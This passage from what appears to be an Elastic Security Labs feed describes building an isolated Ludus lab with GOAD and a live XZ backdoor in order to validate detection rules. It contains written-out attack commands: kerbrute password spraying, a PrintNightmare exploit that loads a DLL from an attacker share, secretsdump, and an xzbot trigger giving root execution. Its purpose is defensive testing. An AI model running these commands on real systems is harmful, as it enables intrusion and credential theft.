<li>GCP Firewall, among others.</li>
</ul>
</li>
<li><strong>Ingest Logs into Elastic Security:</strong> Ensure that the logs are ingested into Elasticsearch, making them accessible in Elastic Security for analysis and visualization. Elastic also enriches ingested firewall logs with helpful context such as geolocation, IP-to-hostname mapping, threat intelligence matches, and even business metadata, making investigations faster and more informed.</li>
</ol>
<p>By following these steps, you can effectively collect, process, and analyze network firewall logs within Elastic.</p>
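<p>As a concrete illustration of step 2, a Linux-based firewall or syslog relay using rsyslog could forward its logs to the Elastic Agent's syslog listener with a single rule. The hostname and port here are hypothetical - match them to the listener configured in your firewall integration:</p>
<pre><code># /etc/rsyslog.d/90-forward-to-elastic-agent.conf
# &quot;@@&quot; forwards all messages over TCP to the host running Elastic Agent
*.* @@elastic-agent.internal:9004
</code></pre>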
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/make-the-most-of-network-firewall-logs-with-elastic/image3.png" alt="An example out-of-the-box dashboard for Fortinet’s Fortigate firewall logs" /></p>
<h2>Exploring Your Data: The Elastic Security Network Page</h2>
<p>Once your firewall logs are flowing into Elastic, you can move from collection to exploration. The <a href="https://www.elastic.co/kr/docs/solutions/security/explore/network-page">Network Page</a> in Elastic Security is your central hub for visualizing and investigating aggregated network data, including firewall data.</p>
<p>Instead of just looking at raw logs, this page provides key network activity metrics in an interactive map and a series of data tables.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/make-the-most-of-network-firewall-logs-with-elastic/image1.png" alt="Aggregated network data" /></p>
<p>Key features of the Network page include:</p>
<ul>
<li><strong>Interactive Map:</strong> Get an immediate visual overview of your network traffic. You can see source and destination points mapped geographically, helping you instantly spot unusual connections, like an internal server communicating with an IP in a country you don't do business with.</li>
<li><strong>Drill-down Widgets:</strong> Interactive widgets allow you to quickly find baselines and outliers. You can see top talkers for:
<ul>
<li>Network Events</li>
<li>DNS Queries</li>
<li>TLS Handshakes</li>
<li>Unique Private IPs</li>
</ul>
</li>
<li><strong>Focused Data Tabs:</strong> The page includes tabs to pivot your investigation into specific data types, such as:
<ul>
<li><strong>Flows:</strong> See source and destination IP addresses and countries.</li>
<li><strong>DNS:</strong> Analyze all DNS network queries.</li>
<li><strong>HTTP:</strong> Inspect received HTTP requests.</li>
<li><strong>TLS:</strong> Investigate handshake details.</li>
</ul>
</li>
<li><strong>Timeline Integration:</strong> You can drag and drop items of interest—like a suspicious IP address or host name—directly from the Network page into Timeline for deeper investigation and correlation.</li>
</ul>
<p>Using this page, you can start to answer foundational questions like, &quot;What is normal traffic for my network?&quot; and &quot;Which external IPs are my internal hosts communicating with most?&quot; This visual exploration is the first step before moving into automated detection.</p>
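<p>From any of these views, you can also narrow the dataset with a quick KQL query in the search bar. For example, to focus on denied inbound SSH connections (field names assume ECS-mapped firewall logs):</p>
<pre><code>event.category: network and event.action: &quot;denied&quot; and destination.port: 22
</code></pre>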
<h2>Start Exploring Your Network Data</h2>
<p>In this post, we've covered the fundamentals: why firewall logs are critical, what's inside them, how to ingest them using Elastic Agent, and how to begin visually exploring that data on the Network page.</p>
<p>In Part 2, we'll build on this foundation and move from <em>exploration</em> to <em>active threat detection</em>. We will cover how to use Elastic Security’s detection rules to automatically find network-native threats like reconnaissance, C2, and data exfiltration, as well as how to hunt for advanced lateral movement by correlating firewall logs with other data sources, such as endpoint telemetry.</p>
<p>Ready to turn your own firewall logs into actionable insights?</p>
<ul>
<li><strong>New to Elastic?</strong> Start your <a href="https://www.elastic.co/kr/cloud/elasticsearch-service/signup">free 14-day trial of Elastic Cloud</a> to see the Network Page in action.</li>
<li><strong>Already an Elastic user?</strong> Head to the <strong>Integrations</strong> app in Kibana, add your firewall's integration, and start exploring your network data today.</li>
</ul>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/make-the-most-of-network-firewall-logs-with-elastic/Security Labs Images 15.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Automating GOAD and Live Malware Labs]]></title>
            <link>https://www.elastic.co/kr/security-labs/automating-goad-and-live-malware-labs</link>
            <guid>automating-goad-and-live-malware-labs</guid>
            <pubDate>Thu, 05 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Stop building labs by hand. Automate the deployment of a fully instrumented Purple Team range using Ludus and Elastic Security. Spin up infrastructure, execute attacks, and validate detection rules in a single, repeatable workflow.]]></description>
            <content:encoded><![CDATA[<h2><strong>Introduction: The Need for a Scalable, Automated Simulation Range</strong></h2>
<p>In modern security operations, detection engineering is no longer a “set it and forget it” discipline. The central challenge for any security team – and the question that underpins the entire purple-team approach – is simple: <em>how do you know whether your detection rules genuinely work?</em> Continually validating detection logic against an ever-shifting adversary toolkit is now a fundamental requirement.</p>
<p>Arguably, the largest hurdle for this exercise has always been setting up the lab. Manually provisioning a multi-domain Active Directory forest, configuring it with specific vulnerabilities, and deploying a separate, contained malware analysis environment is a complex and time-consuming process. This repetitive setup work is a significant drain on an organization's most valuable resource: the time of its senior security analysts. Community discussions echo this frustration, highlighting the hours lost to manual setup before a single test can be run.</p>
<p>This blog details a modern solution that eliminates this bottleneck by combining rapid infrastructure automation with a unified security analytics platform. The solution leverages two key components:</p>
<ol>
<li><a href="https://ludus.cloud/"><strong>Ludus</strong></a><strong>:</strong> An open-source automation overlay that deploys and configures complex, multi-VM cyber ranges from a single command.</li>
<li><a href="https://www.elastic.co/kr/security"><strong>Elastic Security</strong></a><strong>:</strong> The platform that unifies Security Information and Event Management (SIEM), eXtended Detection and Response (XDR), and cloud security, providing a consolidated solution to ingest, detect, and respond to threats. It offers the &quot;limitless visibility&quot; required to observe every action within the simulated environment.</li>
</ol>
<p>The goal of this guide is to provide a definitive, step-by-step blueprint for building this integrated system. It will show how to move from slow, manual, and inconsistent lab testing to a continuous, automated, and scalable detection-engineering workflow beyond what <a href="https://github.com/elastic/cortado">Elastic Cortado</a> provides.</p>
<h2><strong>The Solution Architecture: Ludus + Elastic</strong></h2>
<p>This architecture represents a high-fidelity simulation of a modern hybrid enterprise. The Ludus range acts as the &quot;on-prem&quot; or IaaS data center, while the Elastic Cloud deployment represents the &quot;SaaS&quot; security stack. This model perfectly mirrors the hybrid and multi-cloud environments that Elastic Security is designed to protect, making the <em>architecture</em> of the test as valuable as the attacks themselves.</p>
<p>The build consists of the following core components.</p>
<table>
<thead>
<tr>
<th align="left">Component</th>
<th></th>
<th align="left">Technology</th>
<th align="left">Function</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Foundation (Infrastructure)</strong></td>
<td></td>
<td align="left"><strong>Ludus</strong> (Proxmox/Ansible)</td>
<td align="left">Deploys VM ranges from a single YAML config.</td>
</tr>
<tr>
<td align="left"><strong>Targets</strong></td>
<td></td>
<td align="left"><strong>Identity - GOAD</strong> (Windows Server)<br /><strong>Supply Chain - XZbot</strong> (Debian)</td>
<td align="left">Multi-domain AD forest with intentional vulnerabilities (Kerberoasting, Print Nightmare). Linux host infected with CVE-2024-3094 for supply chain simulation.</td>
</tr>
<tr>
<td align="left"><strong>The Sensor Grid (Visibility)</strong></td>
<td></td>
<td align="left"><strong>Elastic Agent</strong></td>
<td align="left">Unified telemetry collection (EDR + Logs).</td>
</tr>
<tr>
<td align="left"><strong>The Brain (Analysis)</strong></td>
<td></td>
<td align="left"><strong>Elastic Security</strong></td>
<td align="left">SIEM/XDR platform for correlation and AI-driven investigation.</td>
</tr>
</tbody>
</table>
<h3><strong>Component 1: The Foundation (Ludus)</strong></h3>
<p>Ludus serves as the Infrastructure-as-a-Service (IaaS) layer. Built to run on Proxmox 8/9 or Debian 12/13, it uses YAML configuration files to define complex virtual networks, supporting up to 255 distinct VLANs. Behind the scenes, Ludus leverages Packer and Ansible to build, configure, and deploy the virtual machine templates from that single file.<br />
Review and follow the installation steps and hardware requirements in the Ludus <a href="https://docs.ludus.cloud/docs/quick-start/install-ludus">quick-start</a>.</p>
<h3><strong>Component 2: The Targets (The Labs)</strong></h3>
<p>This guide merges two distinct Ludus environments into a single, comprehensive range to test a wider spectrum of threats:</p>
<ul>
<li><a href="https://github.com/Orange-Cyberdefense/GOAD"><strong>Game of Active Directory (GOAD)</strong></a><strong>:</strong> A purpose-built Active Directory lab designed by security researchers at <a href="https://www.orangecyberdefense.com/">Orange Cyberdefense</a>. It is pre-configured with the specific misconfigurations and vulnerabilities needed to simulate common identity-based attack paths, such as Kerberoasting, NTLM Relay, and Active Directory Certificate Services (ADCS) abuse.</li>
<li><a href="https://docs.ludus.cloud/docs/environment-guides/malware-lab"><strong>XZbot Malware Lab</strong></a><strong>:</strong> A high-risk, high-fidelity malware environment. This lab contains the <em>actual, functional</em> CVE-2024-3094 backdoor. This provides a perfect, modern test case for a sophisticated software supply-chain attack.</li>
</ul>
<h4>Important Disclaimer</h4>
<p>Handling live malware, even for research, can violate Acceptable Use Policies (AUPs) of ISPs or cloud providers. Ensure you own the infrastructure (Ludus is on-prem) and ensure your upstream ISP allows for such research, or route traffic through a VPN.</p>
<h3><strong>Component 3: The Sensor Grid (Elastic Agent &amp; Defend)</strong></h3>
<p>To gain visibility, every virtual machine in the Ludus range across both GOAD and XZbot labs will be instrumented with <strong>Elastic Agent</strong>, a single, unified agent for data collection and protection (via Elastic Defend).</p>
<p>This instrumentation is automated via the <a href="https://github.com/badsectorlabs/ludus_elastic_agent"><em>badsectorlabs/ludus_elastic_agent</em></a> Ansible role. This role is the critical lynchpin that programmatically bridges the infrastructure provisioning phase (Ludus/Ansible) with the security instrumentation phase (Elastic), enabling a true &quot;infrastructure-as-code&quot; workflow.</p>
<p>Crucially, the Elastic Agent policy will be configured with the <strong>Elastic Defend</strong> integration. This elevates the agent from a simple log collector to a full-powered Endpoint Detection &amp; Response (EDR)/eXtended Detection &amp; Response (XDR) solution, providing host-based detections (including Machine Learning (ML) driven malware and ransomware detection) and the deep, kernel-level telemetry essential for detection.</p>
<p><em>Note: For the purple team approach outlined in this blog, set policies to <strong>Detect</strong> mode.</em></p>
<h3><strong>Component 4: The Brain (Elastic Cloud Hosted / Elastic Serverless)</strong></h3>
<p>All security telemetry and alerts from the Elastic Agents in the Ludus range are streamed to a centralized <strong>Elastic Cloud Hosted (ECH)</strong> or <strong>Elastic Serverless</strong> deployment. This is where the unified platform's analytical power comes to life. Using a cloud-native platform is not just for hosting; it is what unlocks Elastic's most advanced, force-multiplying features, including <strong>Attack Discovery</strong> and the <strong>AI Assistant</strong>. <a href="https://cloud.elastic.co/registration">Click here to start a trial on Elastic Cloud</a>.</p>
<p>The diagram below provides an overview of the build, which is based on the <a href="https://github.com/Orange-Cyberdefense/GOAD">GOAD lab</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image8.png" alt="" /></p>
<h2><strong>Phase 1: Building and Instrumenting the Range</strong></h2>
<p>This section provides a technical, step-by-step guide to configuring and deploying the automated range. The process follows a clear &quot;infrastructure-as-code&quot; (IaC) model, where the security instrumentation is defined alongside the infrastructure itself, ensuring a consistent and repeatable monitoring posture for every deployment. The Elastic Cloud instance and its configurations can be managed with the <a href="https://registry.terraform.io/providers/elastic/ec/latest/docs">Elastic Cloud</a> and <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack</a> Terraform provider for a full IaC model of the range and the SIEM.</p>
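<p>As a hedged sketch of that full-IaC model, the Elastic Cloud provider can stand up the SIEM deployment itself. The region, version, and deployment template values below are placeholders - adjust them to your own environment, and check the <code>ec_deployment</code> resource documentation for the current schema:</p>
<pre><code>resource &quot;ec_deployment&quot; &quot;ludus_siem&quot; {
  name                   = &quot;ludus-range-siem&quot;
  region                 = &quot;gcp-us-central1&quot;       # placeholder
  version                = &quot;9.0.0&quot;                 # placeholder
  deployment_template_id = &quot;gcp-general-purpose&quot;   # placeholder

  elasticsearch = {
    hot = {
      autoscaling = {}
    }
  }

  kibana = {}

  # Fleet lives here, so the Ludus agents have somewhere to enroll
  integrations_server = {}
}
</code></pre>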
<h3><strong>3.1 Configuring the Elastic Agent Policy (in Kibana)</strong></h3>
<p>Before running the Ludus range deployment, the agent policy must be created in the Elastic Cloud instance. This policy is what enables the powerful EDR/XDR telemetry.</p>
<p>The operational flow is as follows:</p>
<ol>
<li>Log in to the Elastic Cloud (ECH) or Elastic Serverless Kibana instance.</li>
<li>Navigate to <strong>Management &gt; Fleet</strong>.</li>
<li><a href="https://www.elastic.co/kr/docs/reference/fleet/agent-policy#create-a-policy">Create a new <strong>Agent policy</strong></a> (e.g., &quot;ludus-range-policy&quot;). <em>The ludus_elastic_agent role will enroll agents into the policy you specify in your VM-level customization or into the default policy linked to the global variable.</em></li>
<li><a href="https://www.elastic.co/kr/docs/reference/fleet/agent-policy#add-integration">Add the <strong>Elastic Defend</strong> integration</a> to this policy.</li>
<li><a href="https://www.elastic.co/kr/docs/solutions/security/configure-elastic-defend/configure-an-integration-policy-for-elastic-defend">Configure the Elastic Defend integration</a> to run in <strong>Detect</strong> mode. This activates the full suite of EDR telemetries.</li>
<li>Save the policy and click &quot;Add agent.&quot; This will provide the <strong>Enrollment token</strong> (for ludus_elastic_enrollment_token) and <strong>Fleet server URL</strong> (for ludus_elastic_fleet_server) needed for the ludus.yml file.</li>
<li>(<em><strong>Optional</strong></em>) Repeat steps 3-6 to create customized policies to align with the host’s functions and capabilities for VM-level customization of policies.</li>
</ol>
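<p>The UI steps above can also be scripted against Kibana's Fleet API, which fits the same IaC model as the Terraform providers. The sketch below is hedged: the endpoints (<code>/api/fleet/agent_policies</code>, <code>/api/fleet/package_policies</code>, <code>/api/fleet/enrollment_api_keys</code>) are standard Fleet APIs, while <code>KIBANA_URL</code>, <code>API_KEY</code>, and the placeholder IDs are specific to your deployment.</p>
<pre><code># Step 3: create the agent policy
curl -s -X POST &quot;$KIBANA_URL/api/fleet/agent_policies&quot; \
  -H &quot;Authorization: ApiKey $API_KEY&quot; \
  -H &quot;kbn-xsrf: true&quot; -H &quot;Content-Type: application/json&quot; \
  -d '{&quot;name&quot;: &quot;ludus-range-policy&quot;, &quot;namespace&quot;: &quot;default&quot;}'

# Steps 4-5: attach the Elastic Defend integration (package name: endpoint)
# to the agent policy id returned above; pin a concrete package version
curl -s -X POST &quot;$KIBANA_URL/api/fleet/package_policies&quot; \
  -H &quot;Authorization: ApiKey $API_KEY&quot; \
  -H &quot;kbn-xsrf: true&quot; -H &quot;Content-Type: application/json&quot; \
  -d '{&quot;name&quot;: &quot;ludus-defend&quot;, &quot;policy_id&quot;: &quot;&lt;agent-policy-id&gt;&quot;, &quot;package&quot;: {&quot;name&quot;: &quot;endpoint&quot;, &quot;version&quot;: &quot;&lt;package-version&gt;&quot;}}'

# Step 6: list enrollment tokens to copy into ludus.yml
curl -s &quot;$KIBANA_URL/api/fleet/enrollment_api_keys&quot; \
  -H &quot;Authorization: ApiKey $API_KEY&quot;
</code></pre>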
<p>Once this policy is created and the token is pasted into the ludus.yml file, running <code>ludus range deploy</code> will execute the full, automated workflow. Ludus provisions the VMs, and Ansible installs the Elastic Agent, which then enrolls in Fleet and automatically pulls down the policy containing the Elastic Defend integration. This provides the rich EDR telemetry - kernel-level process, file, network, and registry events - from the moment the lab is born.</p>
<h3><strong>3.2 The Ludus YAML Configuration (ludus.yml)</strong></h3>
<p>Ludus provides the steps to deploy the GOAD range <a href="https://docs.ludus.cloud/docs/environment-guides/goad">here</a>. The configuration for the range is stored in the ludus.yml configuration file. For the GOAD range, it is located in <code>ad/GOAD/providers/ludus/config.yml</code>.<br />
The full configuration in the appendix is an example based on a sample running configuration that merges a full GOAD lab (on VLAN 10) with the XZbot lab (on VLAN 20).</p>
<p>To deploy a customized version during installation, update the <code>ad/GOAD/providers/ludus/config.yml</code> file before running the <code>goad.sh</code> script in <a href="https://docs.ludus.cloud/docs/environment-guides/goad#2-on-the-ludus-host-clone-and-setup-the-goad-project">step 2</a>.</p>
<pre><code>git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD
sudo apt install python3.11-venv
export LUDUS_API_KEY='myapikey'  # put your Ludus admin api key here
nano ad/GOAD/providers/ludus/config.yml # customize the configuration here
./goad.sh -p ludus
GOAD/ludus/local &gt; check
GOAD/ludus/local &gt; set_lab GOAD # GOAD/GOAD-Light/NHA/SCCM
GOAD/ludus/local &gt; install
</code></pre>
<p>Two key configuration options can be used to customize the range:</p>
<ol>
<li>
<p><strong>Global Variables:</strong> To simplify the config and avoid repetition, the Elastic Agent variables are defined <em>once</em> in the top-level <code>global_role_vars</code> block and are inherited by all VMs.</p>
<p><em>The enrollment token determines the Elastic Agent policy used.</em></p>
</li>
</ol>
<pre><code># ludus.yml
---
# --- GLOBAL ANSIBLE VARS (Simplification) ---
# Define Elastic agent vars once and apply globally
global_role_vars:
  ludus_elastic_fleet_server: &quot;&lt;your-fleet.example.com:443&gt;&quot; # Use 443 for cloud
  ludus_elastic_enrollment_token: &quot;&lt;your_enrollment_token&gt;&quot;
  ludus_elastic_agent_version: &quot;9.2.1&quot;
</code></pre>
<ol start="2">
<li><strong>VM-level Variables:</strong> The Elastic Agent variables can be configured at the VM-level to customize the policy applied. These can be combined with the global variable, for example, where the agent version and fleet_server are set via global variables, and the enrollment tokens are set at the VM-level to apply different policies to VMs.</li>
</ol>
<pre><code># --- VM DEFINITIONS ---
vms:
  # --- GOAD LAB (VLAN 10) ---
  - name: &quot;{{ range_id }}-GOAD-DC01&quot;
    hostname: &quot;{{ range_id }}-DC01&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 10
    ram_gb: 4
    cpus: 2
    windows: { sysprep: true }
    ansible:
      roles:
        - badsectorlabs.ludus_elastic_agent
      role_vars:
        ludus_elastic_enrollment_token: &quot;&lt;your_enrollment_token&gt;&quot; # different token for different policies
  # (Definitions for GOAD-DC02, GOAD-DC03, GOAD-SRV02, GOAD-SRV03 
  #  would follow, all inheriting the global ansible vars)
</code></pre>
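<p>With the configuration in place, the deployment itself is a short sequence of Ludus CLI calls. A minimal sketch (the file name <code>ludus.yml</code> is this example's; the commands are standard Ludus CLI):</p>
<pre><code># Apply the edited configuration to your range
ludus range config set -f ludus.yml

# Build the range: Ludus provisions the VMs, then Ansible installs
# and enrolls the Elastic Agent on each one
ludus range deploy

# Follow progress and confirm every VM reaches the deployed state
ludus range logs -f
ludus range status
</code></pre>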
<h4>Automating Elastic Agent Deployment</h4>
<p>The ludus.yml snippet above demonstrates the automation. By adding the <code>badsectorlabs.ludus_elastic_agent</code> role to the ansible.roles section of each VM definition, Ludus will automatically install and configure the agent during deployment.</p>
<p>This single Ansible role is compatible with all operating systems in our heterogeneous lab, including Windows (for GOAD), Kali, and Debian (for XZbot).</p>
<p>As shown in the simplified YAML, the top-level <code>global_role_vars</code> block passes the critical parameters to the role:</p>
<ul>
<li>ludus_elastic_fleet_server: The Fleet server URL and port for your Elastic Cloud deployment (e.g., your-fleet.example.com:443).</li>
<li>ludus_elastic_enrollment_token: The token that enrolls the agent.<br />
The full example sets the ludus_elastic_enrollment_token at the VM level to demonstrate the ability to use different policies.</li>
<li>ludus_elastic_agent_version: The specific agent version to install (e.g., 9.2.1).</li>
</ul>
<p><em>Note: The Kali host will also have Elastic Defend deployed to monitor attacker behavior; this won’t be possible in a real-world scenario.</em></p>
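<p>After deployment, enrollment is straightforward to verify. On any lab VM the agent reports its Fleet connectivity directly, and the agents should also show as Healthy under <strong>Management &gt; Fleet &gt; Agents</strong> in Kibana:</p>
<pre><code># On a Linux lab VM: confirm the agent is healthy and connected to Fleet
sudo elastic-agent status

# On a Windows lab VM (elevated PowerShell):
&amp; &quot;C:\Program Files\Elastic\Agent\elastic-agent.exe&quot; status
</code></pre>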
<h2><strong>Safety First: Isolation, OPSEC, and Live Malware</strong></h2>
<p>This section contains a critical safety and operational security (OPSEC) warning. This configuration involves a significant, non-trivial risk that must be professionally managed.</p>
<h3><strong>4.1 The Threat: This is Not a Simulation</strong></h3>
<p>It must be stated unequivocally: The Ludus XZbot lab guide and its associated Ansible role install the <strong>actual, functional CVE-2024-3094 backdoor</strong>. This is not benign, simulated code. The lab's own documentation states: &quot;Danger: This role contains malware (on purpose).&quot;</p>
<p>While described as a &quot;passive backdoor&quot; (meaning it requires an attacker to actively trigger it), any virtual machine running this code with an open internet connection is a catastrophic liability. It could be scanned, exploited by unknown actors, or used as a pivot point to attack other networks.</p>
<h3><strong>4.2 The Contradiction: Isolation vs. Cloud Connectivity</strong></h3>
<p>This architecture creates a direct and critical operational conflict:</p>
<ol>
<li><strong>Requirement 1 (Safety):</strong> The malware lab <em>must</em> be isolated from the public internet to prevent compromise or breakout.</li>
<li><strong>Requirement 2 (Function):</strong> The Elastic Agent <em>must</em> have outbound internet connectivity to reach the Elastic Cloud Hosted / Elastic Serverless endpoints for enrollment and data streaming.</li>
</ol>
<p>A novice user would fail here, either by exposing their infected lab to the world or by isolating it so completely that no security telemetry can be collected.</p>
<h3><strong>4.3 The Solution: Pinhole Egress via Ludus Testing mode</strong></h3>
<p>The conflict is resolved using Ludus's built-in &quot;<a href="https://docs.ludus.cloud/docs/networking#testing-mode">testing</a>&quot; mode, which provides granular control over network egress. This feature is used for the pinhole egress, which enables agent control, telemetry, and log output.</p>
<pre><code># 1. Start the isolated testing session
ludus testing start
# Note: external DNS resolvers may also need to be added
# ludus testing allow -i 1.1.1.1,8.8.8.8

# 2. Allow Elastic Fleet Server (Control Plane)
# Replace &lt;id&gt; with your specific deployment ID
# Note: the endpoint will differ based on the cloud provider
ludus testing allow -d &lt;your-deployment-id&gt;.fleet.us-central1.gcp.cloud.es.io

# 3. Allow Elasticsearch Ingest (Data Plane)
# Note: the endpoint will differ based on the cloud provider
ludus testing allow -d &lt;your-deployment-id&gt;.es.us-central1.gcp.cloud.es.io
</code></pre>
<p>This configuration delivers an expert-level solution: the malware is safely contained, while the Elastic Agent is granted only the minimal connectivity required to make policy updates (via communication with the <code>fleet</code> endpoint) and to ingest data (via communication with the <code>ES</code> endpoint).</p>
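<p>Before detonating anything, it is worth verifying the pinhole from inside the lab. A hedged sketch run from any lab VM, with the deployment hostname left as a placeholder:</p>
<pre><code># General egress should fail: the router drops the traffic
curl -s --max-time 5 https://example.com &amp;&amp; echo &quot;LEAK: egress open&quot; || echo &quot;OK: egress blocked&quot;

# The allowed Elastic endpoints should still answer
curl -s --max-time 5 &quot;https://&lt;your-deployment-id&gt;.es.us-central1.gcp.cloud.es.io:443&quot; &gt;/dev/null \
  &amp;&amp; echo &quot;OK: ingest reachable&quot; || echo &quot;FAIL: ingest blocked&quot;
</code></pre>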
<h3><strong>4.4 Accessing the Range in Testing Mode (WireGuard)</strong></h3>
<p>Once Testing Mode is active, standard routing fails. You cannot simply SSH into your Kali VM from your local LAN because the router drops the traffic. Ludus provides an out-of-band management channel using WireGuard.</p>
<p>Ludus configures a WireGuard interface (wg0) on the router VM (198.51.100.1) and assigns you a static client IP (e.g., 198.51.100.2).</p>
<ul>
<li><strong>Persistent Allow Rules:</strong> The router's firewall configuration includes specific rules in the LUDUS_DEFAULTS chain. These rules explicitly <strong>ACCEPT</strong> traffic sourced from or destined to the WireGuard subnet (198.51.100.0/24).</li>
<li><strong>Priority:</strong> Because these rules exist in the LUDUS_DEFAULTS chain, they override the DROP rules applied by Testing Mode.</li>
</ul>
<p><strong>How to connect:</strong></p>
<ol>
<li><a href="https://docs.ludus.cloud/docs/quick-start/using-cli-locally#wireguard">Generate your config</a>: <code>ludus user wireguard &gt; ludus.conf</code></li>
<li>Import this into your local WireGuard client and activate the tunnel.</li>
<li>Connect directly to the private IPs of your VMs (e.g., 10.10.10.11) over the tunnel.</li>
</ol>
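<p>On a Linux workstation the connection sequence looks like this (wg-quick ships with the standard WireGuard tools; the target IP is an example following Ludus's 10.&lt;range&gt;.&lt;vlan&gt;.&lt;octet&gt; addressing used in the config above):</p>
<pre><code># Fetch your client config from the Ludus server and bring the tunnel up
ludus user wireguard &gt; ludus.conf
sudo wg-quick up ./ludus.conf

# Verify the tunnel, then reach a lab VM directly by its private IP
sudo wg show
ping -c 2 10.10.10.10   # e.g., the GOAD DC01 defined earlier (VLAN 10, octet 10)
</code></pre>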
<h2><strong>Phase 2: Executing the Attacks</strong></h2>
<p>With the high-fidelity, fully instrumented range deployed, the &quot;Red Team&quot; phase can begin. This involves logging into a dedicated attacker VM (like the included Kali VM or a remnux-analyzer VM) and executing the attacks. This activity generates the rich, malicious telemetry that Elastic Defend will capture.</p>
<p>This combined range allows for testing defenses against the two dominant, macro-level threat vectors: identity-based &quot;living-off-the-land&quot; (LotL) attacks and vulnerability-based supply-chain intrusions.</p>
<h3><strong>5.1 Active Directory Simulation (GOAD)</strong></h3>
<ul>
<li><strong>Initial Access</strong> (Credential Stuffing)
<ol>
<li>The attacker targets the external perimeter. Using a list of breached credentials, you execute a password stuffing attack against the Essos.local domain. You successfully validate the credentials for the user khal.drogo.</li>
<li>Sample Tool: kerbrute or smartbrute</li>
<li>Result: Valid credentials for a low-privilege domain user.</li>
</ol>
</li>
<li><strong>Privilege Escalation</strong> (PrintNightmare)
<ol>
<li>khal.drogo has limited rights. To gain a foothold on the CastelBlack server, you exploit PrintNightmare (CVE-2021-34527). This vulnerability in the Windows Print Spooler service allows any authenticated user to install a malicious print driver. You upload a driver that adds a new local admin user to the box.</li>
<li>Sample Tool: CVE-2021-34527.py exploit script</li>
<li>Result: Local SYSTEM access on CastelBlack.</li>
</ol>
</li>
<li><strong>Credential Dump</strong> (DCSync Preparation)
<ol>
<li>Now running as SYSTEM/Admin on CastelBlack, you inspect the machine for cached credentials. You run Impacket's secretsdump to pull hashes from the SAM database and LSASS memory. You discover the NTLM hash for the built-in Administrator account, which was left in memory from a previous support session.</li>
<li>Sample Tool: impacket-secretsdump</li>
<li>Result: NTLM Hash of a Domain Admin or high-privilege account.</li>
</ol>
</li>
<li><strong>Kerberoasting</strong>
<ol>
<li>With valid domain credentials, you pivot to the internal network. You request Kerberos Service Tickets (TGS) for Service Principal Names (SPNs) in the environment. You target the MSSQLSvc account. You take the encrypted ticket offline and crack it to reveal the plaintext password for the SQL service account.</li>
<li>Sample Tool: Rubeus or GetUserSPNs.py</li>
<li>Result: Plaintext password for the MSSQL service account.</li>
</ol>
</li>
<li><strong>MSSQL Attacks</strong>
<ol>
<li>You use the cracked SQL credentials to authenticate directly to the Braavos SQL Server. Since the service account has sysadmin rights, you abuse the xp_cmdshell stored procedure. This feature allows you to spawn a Windows command shell directly from a SQL query, effectively giving you Remote Code Execution (RCE) on the database server.</li>
<li>Sample Tool: mssqlclient.py</li>
<li>Result: RCE on the Database Server.</li>
</ol>
</li>
<li><strong>Persistence</strong> (Scheduled Task)
<ol>
<li>To ensure you don't lose access if the SQL password changes, you establish persistence. You create a Windows Scheduled Task on the compromised SQL server. This task is configured to execute a beacon binary every day, running as SYSTEM.</li>
<li>Sample Tool: schtasks.exe or PowerShell</li>
<li>Result: Long-term persistence.</li>
</ol>
</li>
</ul>
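<p>To make the chain concrete, the first three steps might look like this from the Kali VM. The tool syntax is standard kerbrute/Impacket usage, but every IP address, wordlist, and credential here is a placeholder invented for illustration:</p>
<pre><code># 1. Credential stuffing against the Essos.local DC
./kerbrute passwordspray -d essos.local --dc 10.10.10.12 users.txt 'horse'

# 2. PrintNightmare: load a malicious driver DLL on CastelBlack
python3 CVE-2021-34527.py 'essos.local/khal.drogo:horse@10.10.10.22' '\\10.10.10.99\share\evil.dll'

# 3. Dump SAM/LSASS secrets with the newly added local admin
impacket-secretsdump 'castelblack/backdoor_admin:Password1@10.10.10.22'
</code></pre>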
<h3><strong>5.2 Malware Lab Simulation (XZbot)</strong></h3>
<ul>
<li>Step 7: Supply Chain Pivot (XZ Backdoor)</li>
<li>Simultaneously, you target the Linux infrastructure in the DMZ. You trigger the pre-implanted XZ Backdoor (CVE-2024-3094) on the xz-backdoor-dect VM. By manipulating the SSH handshake with a specific cryptographic key, you bypass authentication entirely and execute commands as root without leaving standard SSH logs.</li>
<li>Tool: xzbot</li>
<li>Result: Root access on Linux infrastructure via supply chain compromise.</li>
<li>The attacker uses the xzbot client provided in the Ludus lab.</li>
<li>From the attacker VM, the following command is run to trigger the backdoor on the vulnerable Debian host:<br />
xzbot --ssh-addr '10.X.X.X:22' -cmd 'setsid sh -c &quot;echo test&quot;' 2&gt;&amp;1</li>
<li>This action causes the sshd process on the target to anomalously spawn a shell and execute the command as root, creating definitive proof of execution.</li>
</ul>
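<p>Before (or after) triggering the backdoor, you can confirm the implant is present on the target. Only xz/liblzma releases 5.6.0 and 5.6.1 shipped the CVE-2024-3094 backdoor, so a minimal version check can be scripted. This sketch only assumes <code>xz --version</code> prints a first line ending in the version number:</p>
<pre><code>#!/bin/sh
# Return 0 (vulnerable) when the version matches one of the two
# backdoored releases associated with CVE-2024-3094
is_vulnerable_xz() {
  case &quot;$1&quot; in
    5.6.0|5.6.1) return 0 ;;
    *) return 1 ;;
  esac
}

# Parse the version from the first line of `xz --version`
ver=$(xz --version 2&gt;/dev/null | awk 'NR==1 {print $NF}')
if is_vulnerable_xz &quot;$ver&quot;; then
  echo &quot;xz $ver: backdoored release (CVE-2024-3094)&quot;
else
  echo &quot;xz $ver: not one of the known-bad releases&quot;
fi
</code></pre>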
<h2><strong>Phase 3: Unified Detection &amp; Investigation with Elastic Security</strong></h2>
<p>This is the &quot;Blue Team&quot; payoff. The telemetry and alerts generated in Phase 2 are now available for analysis within the unified Elastic Security platform.</p>
<h3><strong>6.1 The &quot;Powerful SIEM&quot;: Centralized Visibility &amp; Prebuilt Detections</strong></h3>
